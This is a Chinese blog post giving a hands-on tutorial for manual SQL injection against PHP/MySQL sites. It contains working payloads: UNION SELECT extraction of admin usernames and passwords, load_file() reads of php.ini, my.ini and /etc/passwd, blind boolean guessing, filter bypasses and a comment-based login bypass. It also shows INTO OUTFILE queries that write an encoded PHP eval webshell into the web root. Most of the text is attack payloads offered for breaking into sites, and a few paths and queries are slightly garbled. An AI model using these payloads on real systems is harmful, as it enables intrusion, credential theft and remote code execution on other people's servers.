现在的位置: 首页 > 综合 > 正文

MYSQL手工注入_复习

2013年08月02日 ⁄ 综合 ⁄ 共 11746字 ⁄ 字号 评论关闭

mysql

4.0以上支持union

4.1以上支持子查询

5.0以上有了系统表

———————————————————————————————————————————-

判断是否存在注入:首先,PHP和ASP判断注入的方法一样,在一个动态连接后面加上and 1=1,and 1=2看其返回结果即可判断.两次返回结果不相同,即可初步判断为有注入点.

判断字段大小:接下来,对付php猜字段的方法,我们用order by.语法如下:

CODE:

http://127.0.0.1/1.php?id=1order by 40 //如果返回正常,说明实际的字段要比40大.那么我们继续加.一直加到返回错误.

CODE:

譬如当http://127.0.0.1/1.php?id=1order by 4

5的时候出错了,那么我们就知道字段大小为4.

UNION SELECT:知道字段大小以后,我们就用union select联合查询来列出所有字段.

CODE:

http://127.0.0.1/1.php?id=1and 1=2 union select 1,2,3,4~44/* //这里我们列出了44个字段,并且以/*告诉MYSQL,我们的命令已经执行完毕.

你就可以在回显出来的相应的字段上,替换你要查询的字段名,再from表明.就可以得到相应的字段内容了.譬如:

CODE:

http://127.0.0.1/1.php?id=1and1=2 union select 1,2,3,4,~30,passwd,32,~45 from member/* //~表示我这里省略.你不能那么写.

几个常用的MYSQL函数:好了,现在我们把字段都列出来了.估计这时候有人就该急急忙忙的加from来猜密码了.实际上,猜测密码走后台这一招,我们应该放在最后.有人说MYSQL的功能,和ACCESS一样,甚至还不如,这其实是误解,冤枉了MYSQL.我们下面来看看,MYSQL都有些什么高级的运用.

这里首先列出几个常用的涵数:

1:system_user()

2:user() 返回MYSQL用户名

3:current_user()

4:session_user()

5:database() 返回当前数据库名

6:version() 返回当前数据库版本信息

7:load_file() 返回文件的内容

他们的含义分别如下:

1:系统用户名.2:用户名.3:当前用户名:4连接数据库的用户名.5:数据库名.6:数据库版本.7:MYSQL读取本地文件的函数

他们都有什么用?1-6的作用如下:

这几个函数翻回来的信息在检测过程中具有非常重要的作用,他们对我们了解目标,分析目标,寻找漏洞,开阔思路等等都有莫大的作用.譬如了解系统的版本,了解数据库是否支持union,当前用户是否ROOT用户的初步判断等等…函数7的作用就更大了,我们接下来单独说.

专说load_file()函数的作用与技巧.

OK.load_file是MYSQL用来读取本地文件时,会用到的函数.在我们注入时的权限可以读写文件时,load_file就有无比巨大的作用了.怎么判断有我们注入点的权限呢?很简单,在注入点后加上and (select count(*) from mysql.user)>0/*如果结果返回正常,那么就是具有读写权限了.我们就可以用这个函数去读取系统的敏感文件,去寻找配置文件,寻找数据库连接文件,寻找社工文件,寻找WEB物理路径等等.下面,我给大家总结出了敏感文件列表:

WINDOWS下:

load_file(char(99,58,47,119,105,110,100,111,119,115,47,112,104,112,46,105,110,105)) c:/windows/php.ini //里面有什么不用我说了吧?

load_file(char(99,58,47,119,105,110,110,116,47,112,104,112,46,105,110,105)) c:/winnt/php.ini

load_file(char(99,58,47,119,105,110,100,111,119,115,47,109,121,46,105,110,105)) c:/windows/my.ini //管理员登陆过MYSQL会留下密码和用户名

load_file(char(99,58,47,119,105,110,110,116,47,109,121,46,105,110,105)) c:/winnt/my.ini

load_file(char(99,58,47,98,111,111,116,46,105,110,105)) c:/boot.ini

LUNIX/UNIX下:

load_file(char(47,101,116,99,47,112,97,115,115,119,111,114,100)) /etc/password //不用我说了吧?

load_file(char(47,117,115,114,47,108,111,99,97,108,47,104,116,116,112,100,47,99,111,110,102,47,104,116,116,112,100,46,99,111,110,102)) /usr/local/httpd/conf/httpd.conf //也许能找到网站默认目录哦!

load_file(char(47,117,115,114,47,108,111,99,97,108,47,97,112,97,99,104,101,50,47,99,111,110,102,47,104,116,116,112,100,46,99,111,110,102)) /usr/local/apache2/conf/httpd.conf //也许能找到网站默认目录哦!

FreeBSD下:

load_file(char(47)) //列出了此FreeBSD系统的根目录

大概有朋友看到这里就该叫了,这都什么啊.char()是什么呀?后面一大串又是什么啊?(系统不明白的就不用问了,自己去GOOGLE).

实际上,就算你拥有读和写权限的一个注入点,如果你直接执行load_file(c:\boot.ini),一般都回显不了,遇到这样的情况,你有两个选择.

1把路径转为16进制,直接提交数据库.

2把路径转为10进制,用char()函数还原回ASCII.

譬如c:\boot.ini,转换为16进制就是:”0x633A5C626F6F742E696E69″,然后你直接用load_file(0x633A5C626F6F742E696E69)就可以了. 如果转换为10进制,那么就是:”99 58 92 98 111 111 116 46 105 110 105″.你需要使用char()来转换,转换之前,你需要在TXT里做个批量替换,把空格都转为”,”号.即:load_file(char(99,58,92,98,111,111,116,46,105,110,105)).注意不要少了扩号,都是对称的.

说到这里,估计又有小菜要叫了..都弄好啦,放那里去执行啊?!别急,看看下图.

只要把load_file()放到页面出现的字段上,最好保证有足够位置能显示完你要显示的文件.实在没有足够位置也不紧张,下面我再教你几招.

1:有时候,你明明确认自己拥有读和写文件的权利,却硬是读不出来文件,或者一片空白.为什么?原因可能是对方的系统在权限配置上做的好,你的USER权限,读不到他ADMINISTRATOR里的文件.NTFS和LINUX都能做到这点.如果你排除以上情况,你就要考虑,是不是你读出来的内容,被浏览器当作HTML,ASP,PHP,ASPX,JSP等等的脚本语言给执行了?譬如你读出来的内容如果含有<>等符号,那么浏览器就会执行你的文件内容,你自然什么都看不到.对付这样的情况,也很简单,我们只要把那些特殊的符号,在读出来的时候,用别的符号去代替他们,这样浏览器就不会去执行他们了!怎么代替?我们有replace(load_file(A),char(60),char(32))函数在!当你读A文件出来的时候,如果里面有”<”,那么MYSQL会用”
“去代替B,然后再显示出来.OK.我们这么一换上:replace(load_file(A)),char(60),char(32)).这里一样用的CHAR()函数转换为字母即一旦出现”<”符号,就用空格来代替他.这样就能完整的回显内容给你了.

2:所有的字段位置都不够位置回显,读到的文件不完整哦,又不是上面的原因,那么怎么办呢?这里我们用Substring(str,pos,len)函数解决问题.他的意思是从字符串str的pos位位置起返回len个字符的子串.譬如Substring(load_file(A),50,100)就是把A的内容的第50个字母开始回显100个给你.那么就能逐段逐段的回显啦.

into outfile的高级运用!

OK.load_file()我们就说那么多了.接下来,我们还有许多的重头戏要来呢!这里,我要说下一个很重要的运用方法,也正是我着重参考剑心几部作品的技术的部分.当我们确定如下几个条件以后:

1获得物理路径(into outfile ‘物理路径’) 这样才能写对目录

2能够使用union (也就是说需要MYSQL3以上的版本)

3对方没有对 ‘ 进行过滤(因为outfile 后面的 ‘ ‘ 不可以用其他函数代替转换)

4就是MYSQL用户拥有file_priv权限(不然就不能写文件 或者把文件内容读出)

5对web目录有写权限MS的系统一般都有权限,但是LINUX通常都是rwxr-xr-x 也就是说组跟其他用户都没有权限写操作.

这里的1,我们一般可以靠数据库出错信息来爆出来,不行的话,也可以通过load_file()来得到.2那是一般都可以的了…3也不多见对”’过滤的.4有没有权限,我们前面已经测试过的了.5如果不能备份到网站的路径上来,我们也还有别的办法,譬如到starup,run里面去等等社工的办法.而且一般多试试上传目录,图片目录,还是大部分都有读写权限的.

OK.需要的条件确定了,那怎么用呢?我们分开两部来说用法.

用法1:这是中规中矩的用法,大家都知道.就是采用网站有的留言,上传等功能,把你的一句话马弄上去,然后使用

CODE:

http://www.tian6.com/coder.php?id=1and 1=2 union select 1,load_file( /www/home/html/upload/qingyafengping.jpg),3,4,5,6 into outfile ‘/www/home/html/coder.php’/* 你的小马就诞生了.

其中/www/home/html/upload/qingyafengping.jpg为你已上传的木马地址.3,4,5,6为假设存在字段,/www/home/html/为假设的WEB路径.

用法2,也是重点要说的.上面的方法,局限性还是比较大的,如果网站不给你上传,或者网站过滤上传的内容,那怎么办?不用怕,剑心早在几年前就给我们想到了个好办法.我们只需要直接这么执行URL:

CODE:

http://www.tiany6.com/coder.php?id=1and 1=2 union select 1,char(这里是你的马的代码,记得转为10进或者16进),3,4,5,6 into outfile ‘/www/home/html/coder.php’/* 这样你的小马也诞生了,不需要上传,也不怕他过滤.

譬如

CODE:

http://www.tiany6.com/coder.php?id=1and 1=2 union select 1,char(60,63,112,104,112,32,101,118,97,108,40,36,95,80,79,83,84,91,99,109,100,93,41,63,62),3,4,5,6 into outfile ‘/www/home/html/coder.php’/*

或者

http://127.0.0.1/coder.php?id=1 and 1=2 union select 1,0x3C3F706870206576616C28245F504F53545B636D645D293F3E,3,4,5,6 into outfile ‘/www/home/html/coder.php’/*

或者

http://127.0.0.1/coder.php?id=1 and 1=2 union select 1,’‘,3,4,5,6 into outfile ‘/www/home/html/coder.php’/*

3,4,5,6为假设存在字段,/www/home/html/为假设的WEB路径.

小结:

1.判断是否存在注入,加’;and 1=1;and 1=2

2.判断版本and ord(mid(version(),1,1))>51 /*返回正常说明是4.0以上版本,可以用union查询

3.利用order by 暴字段,在网址后加order by 10 /*如果返回正常说明字段大于10

4.再利用union来查询准确字段,如:and 1=2 union select 1,2,3,……./*直到返回正常,说明猜到准确字段数。如过滤了空格可以用/**/代替,and 1=2的作用是让前一句出错,使得服务器返回后一句执行结果

5.判断数据库连接帐号有没有写权限,and (select count(*) from mysql.user)>0 /*如果结果返回错误,那我们只能猜解管理员帐号和密码了。

6.如果返回正常,则可以通过and 1=2 union select 1,2,3,4,5,6,load_file(char(文件路径的ascii值,用逗号隔开)),8,9,10 /* 注:load_file(char(文件路径的ascii值,用逗号隔开))也可以用十六进制,通过这种方式读取配置文件,找到数据库连接等。

7.首先猜解user表,如:and 1=2 union select 1,2,3,4,5,6…. from user /*如果返回正常,说明存在这个表。

8.知道了表就猜解字段,and 1=2 union select 1,username,3,4,5,6…. from user/*如果在2字段显示出字段内容则存在些字段。

9.同理再猜解password字段,猜解成功再找后台登录。

10.登录后台,上传shell。

=========================================================

更改配置文件的位置:

mysqld-nt.exe –defaults-file=dir

例如:

mysqld –defaults-file=”C:\MySql_5\my.ini”

==================================================================================

sql注入中常遇到mysql的数据库,其实apache+mysql+php权限还是比较高的,所以这类站点一旦拿下,可利用的价值是很高的。简单介绍针对MYSQL的数据库注入常用到的函数和系统数据库。

1、常用到的函数

1.1 version()—–显示MYSQL的版本

MYSQL4.0以上的版本支持union查询,默认有INFORMATION_SCHEMA数据库,INFORMATION_SCHEMA数据库数据库很有用。所以判断系统版本也比较重要。

1.2 user()——–链接数据库的用户

通过这个函数可以知道链接数据库的用户是什么,连接数据库的用户不同权限也就不同,如果有幸遇到是root用户,顺便能搞到密码,那就太爽了。

1.3 database()—-当前的数据库名称

查看当前的数据库名,后面会用到。

2、有用的系统数据库INFORMATION_SCHEMA

关于INFORMATION_SCHEMA数据库,mysql大于5.0的版本默认安装后都有INFORMATION_SCHEMA数据库,INFORMATION_SCHEMA提供了访问数据库元数据的方式,是MYSQL的信息数据库,其中保存着关于MySQL服务器所维护的所有其他数据库的信息,通过这个数据库可以查看服务器上创建了那些数据库,数据库有哪些表,表中有哪些字段,对注入很有用途。

2.1 查看数据库服务器上的数据库

SELECT 1,2,SCHEMA_NAME,4 FROM INFORMATION_SCHEMA.SCHEMATA LIMIT N,1–

2.2 查看某个数据库里面的数据表

SELECT 1,2,table_name,4 FROM INFORMATION_SCHEMA.TABLES WHERE table_schema =’数据库名’ LIMIT N,1–

2.3 查看某个数据表里面的字段

SELECT 1,2,COLUMN_NAME,4 FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name =’表名’ AND table_schema =’数据库名’ LIMIT N,1–

其中 N(从0开始) 表示第几条记录,可以依次查看,知道得到想要的结果,不加LIMIT N,1将列出全部或当前。每一句后最好加上–或/*,否则可能出错.

快速暴表(如果表太多显示不出来可以用substring)

http://www.80lr.com/a.php?id=1and 1=2 union select 1,group_concat(table_name),3,4,5 from information_schema.tables where

table_schema=database()–

快速暴字段

http://www.80lr.com/a.php?id=1and 1=2 union select 1,group_concat(column_name),3,4,5 from information_schema.columns where

table_name=表名的hex值–

双暴字段内容(0x3a 是:的意思)

http://www.80lr.com/a.php?id=1and 1=2 union select 1,group_concat(username,0x3a,password),3,4,5 from admin

简单介绍下这个结构:

+—————————————+

| Tables_in_information_schema |

+————————————————+

| CHARACTER_SETS |

| COLLATIONS |

| COLLATION_CHARACTER_SET_APPLICABILITY |

| COLUMNS |

| COLUMN_PRIVILEGES |

| KEY_COLUMN_USAGE |

| ROUTINES |

| SCHEMATA |

| SCHEMA_PRIVILEGES |

| STATISTICS |

| TABLES |

| TABLE_CONSTRAINTS |

| TABLE_PRIVILEGES |

| TRIGGERS |

| USER_PRIVILEGES |

| VIEWS |

+—————————————+

这里只挑注射中可以用到的几个表。

| SCHEMATA ――>存储数据库名,

| 关键字段:SCHEMA_NAME,表示数据库名称;

|TABLES ―——―>存储表名

| 关键字段:TABLE_SCHEMA表示表所属的数据库名称;

TABLE_NAME表示表的名称

| COLUMNS —-―>存储字段名

| 关键字段:TABLE_SCHEMA表示表所属的数据库名称;

TABLE_NAME表示所属的表的名称

COLUMN_NAME表示字段名

==================================================================================

技巧:

用repalce函数将load_file结果中的 ‘<’ (0x3c) 换成 ‘:’ (0x3a)

http://www.hacked.cn/autocar/show.php?id=-42 and 1=3 union select replace(load_file(0x443a5c71696368657765625c6361725c6c6f67696e5f636865636b2e706870),0x3c,0x3a),2

当version < 4 ,或者搜索型注入不能用union时,下面的方法很有用 /help.php?id=3 and ord(mid(version(),1,1))>51/* 看版本大于3不,支不支持union

/news/display.php?id=467 and (select char_length(user()) )%3E6 and 1=1– 看总数

/help.php?id=3 and ord(mid(user(),1,1))=114/*,返回错误,说明不是root

/help.php?id=3 and (select count(*) from mysql.user)>0 /* 不是root没关系,看看有没有写权限

/news/display.php?id=467 and (select ascii( substr(user(),1,1)) )%3E32 and 1=1 –一个一个猜

/news/display.php?id=467 and (select count(*) from article_admin) and 1=1–猜表名,在当前数据库中

/help.php?id=3 and (select username from movie_admin) and 1=1–猜列名

/help.php?id=3 and (select char_length(username) from movie_admin)>4 and 1=1–猜列长度

/help.php?id=3 and (select ascii( substr(username,1,1)) from movie_admin)%3E96 and 1=1–猜列记录

/* %3E是>,这样一可以绕过防注入,二可以实现猜解(当无法爆的时候,里面的函数可以换成database(),version()等) */

a.php?action=search&keyword=a%25′+and+(select+length(load_file(0xAAAAA)))<=32+and+1=1+and+’%25′=’ /* Loadfile()

a.php?action=search&keyword=a%25′+and+(select+ascii(substr(load_file(0xAAAAA),1,1)))<=256+and+1=1+and+’%25′=’

如果有读文件权限的话,读取mysql连接文件,获得用户名密码,然后访问/phpmyadmin/,输入密码拿shell。

======================================================================

POST表单型PHP注入

Php的环境一般是apache+php+mysql,平常配置服务器一般是打开php.ini里的安全模式,将safe_mode设为on,还有就是将display_erors设为off,即关闭错误显示。还有一个非常重要的配置选项—–magic_quotes_gpc,高版本默认为on,以前的版本中默认为off。当magic_quotes_gpc为on的时候我们怎么防范php的字符变量注入呢?其实只需将提交的变量中的所有单引号、双引号、反斜线和空字告符自动转换为含有反斜线的转义字符。如把“’”变成“\”,把“\”变成“\\”,就ok了。下面我们分为对magic_quotes_gpc=off和magic_quotes_gpc=on的注入清况分析一下。

我们先看一段有漏洞的php代码,这段代码是用来搜索的。

从上面代码中我们可以看出,是一个搜索表单,通过post提交数据,并进行select查询,

当然要分析这些漏洞我们得先掌握php语言和mysql语法。

如果我们从表单中提交% ‘ order by id #(#号在mysql中表示注释,不执行后面的sql语句),

或者用’ order by id #,带入的sql语句就成了

select * from users where username like ‘% %’ order by id # order by username

select * from users where username like ‘%’ order by id # order by username

这样数据库的内容会全部返回,列出所有用户名,还有密码等。当然还有update 语句注入攻击、insert语句注入攻击等,最常用的是union语法注入,采用into outfile语句导出php脚本木马。

首先要清楚一些mysql语句,如select load_file(‘c:/boot.ini’)我们可以查看c盘下的boot.ini文件内容,在有注入点的网址后面加入该查询语句就可以显示出黑客们想获得的敏感信息,如查看数据库的连接文件获得数据库帐号,查看etc/password信息等。Select * from table into outfile “C:\\Inetpub\\ wwwroot\\shell.php”;也就是从表中导出字符串到C:\Inetpub\wwwroot\shell.php中,

通常黑客们在得到mysql帐号的情况下,利用create table rose(cmd text);建立一个rose表,字段cmd为text类型,

然后用use rose;打开rose表,

insert into rose values(“ “)加入一句话马到字段里。

然后selec t * from rose in to outfile “C:\\Inetpub\\wwwroot\\shell. php “;将一句话木马导出为一个shell.php文件.

当magic_quotes_gpc=on时,提交变量中的所有单引号、双引号、反斜线和空字符会自动转换为含有反斜线的转义字符,字符型的注入可以防范,但数字型没有用到单引号,字符型注入也可以通过char()将参数解释为整数,并返回由这些整数的ASCII码字符组成的一个字符串,也可以用16进制来代替字符。

例如:在浏览器里输入http://localhost/www/admin/login.php?username=char(114,111,115,101)%23

上面假设的我们知道的用户名是rose,转换成ASCII后是char(114,111,115,101),%23是#号,表注释。那么sql语句变成:select * from example where username=char(114,111,115,101)# and password=’ ‘,后面的and password=’ ‘被注释掉了,我们顺利进入后台。

======================================================================

1.and 1=2 union select 1,CONCAT(列名,0x7C,列名) from 表名/*

2.id[]=1暴路径

3.mysql5 : and 1=2 union select TABLE_SCHEMA,COLUMN_NAME from information_schema.STATISTICS/*

4.,CONCAT(0x5F46696C6553746172745F,load_file(0x433A5C626F6F742E696E69),0x5F46696C65456E645F)

========================================================================

information_schema:

1: KEY_COLUMN_USAGE表

constraint_schema: 存放数据库名

table_schema: 存放数据库名

table_name: 存放数据库表信息

column_name: 存放数据库的字段信息,一般可以获取第一个字段或者自增字段的信息

2: SCHEMA表

schema_name: 存放数据库名

default_charater_set_name: 存放charset类型

default_collation_name: 存放charset相关信息

3: SCHEMA_PRIVILEGES表

grantee: 存放数据库用户名

table_schema: 表名

privilege_type: 权限

4: STATISTICS表

table_schema: 存放数据库名

table_name: 存放表名

index_schema: 数据库名

index_name: 是否缩引?

column_name: 存放索引自增字段?

5: TABLES表

抱歉!评论已关闭.